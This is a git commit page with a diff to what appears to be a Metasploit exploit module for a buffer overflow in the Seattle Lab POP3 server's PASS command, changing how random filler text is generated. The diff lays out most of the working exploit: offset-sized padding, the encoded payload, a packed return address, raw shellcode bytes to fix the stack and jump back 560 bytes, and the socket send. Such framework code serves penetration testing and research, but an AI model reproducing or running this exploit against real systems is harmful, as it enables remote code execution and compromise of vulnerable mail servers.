Fixed a bug reported by Dan Faerch (typos)
git-svn-id: file:///home/svn/framework3/trunk@4892 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e8c5c53e4b
commit
ff8d5e6ee3
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
@ -96,19 +96,19 @@ class Exploits::Windows::Pop3::SeattleLabPass < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
sock.put("USER #{rand_english_text(10)}\r\n")
|
||||
sock.put("USER #{rand_text_alphanumeric(10)}\r\n")
|
||||
res = sock.get_once
|
||||
if banner !~ /^\+OK (.*) welcome here$/
|
||||
print_error("POP3 server rejected username")
|
||||
return
|
||||
end
|
||||
|
||||
request = "PASS " + rand_english_text(target['Offset'] - payload.encoded.length)
|
||||
request = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length)
|
||||
request << payload.encoded
|
||||
request << [target.ret].pack('V')
|
||||
request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack
|
||||
request << "\xe9\xcb\xfd\xff\xff" # go back 560 bytes
|
||||
request << rand_english_text(512) # cruft
|
||||
request << rand_text_alphanumeric(512) # cruft
|
||||
request << "\r\n"
|
||||
|
||||
sock.put(request)
|
||||
|
|
Loading…
Reference in New Issue